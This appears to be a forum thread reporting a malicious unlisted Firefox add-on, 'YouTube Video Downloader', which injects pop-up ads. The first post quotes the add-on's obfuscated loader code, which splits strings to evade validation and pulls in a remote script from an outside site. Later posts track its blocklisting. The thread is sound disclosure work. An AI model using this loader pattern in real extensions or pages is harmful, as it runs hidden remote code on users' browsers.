Rogue YouTube Video Downloader addon hijacking links and injecting pop ups

Add-ons
#1

The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage.

This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/

A quick inspection to its source code already shows a red flag in its include folder contents, namely the link_modifier.js file which contains the following code in its entirity:

var s = document.createElement(‘scr’+‘ipt’);
s.type = ‘text/ja’+‘va’+‘scr’+‘ipt’;
s.src = ‘http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js’;
document.getElementsByTagName(‘head’)[0].appendChild(s);

It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script.

I didn’t find any notice/content policy informing the user of this malware-like behavior and don’t think needed to inspect more of the source code after finding that file.

1 Like
#2

I have just filled a blocklist request for this addon.

https://bugzilla.mozilla.org/show_bug.cgi?id=1231010

Thanks for reporting!

1 Like
#3

Thanks @Swarnava and @nathan for this report, can you please link us to the listing on addons.mozilla.org (AMO)?

#4

This is a unlisted addon, it is hosted on the developer’s website from what I could gather http://addoncrop.com/youtube_video_downloader/

1 Like
#5

This is a unlisted addon, it is hosted on the developer’s website from what I could gather. Can’t post its link here because it triggers the spam filter but a user posted that link in the reddit thread.

#6

Thanks for that, but there is a problem. When you copied the thread link you also copied the number of clicks the link had, which was 1. This causes the mentioned link to fail when someone tries to open it because it ends with “1”.

1 Like
#7

Just a fyi, Addon is now blocked: Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077

#8

Yes, thank you for the reports!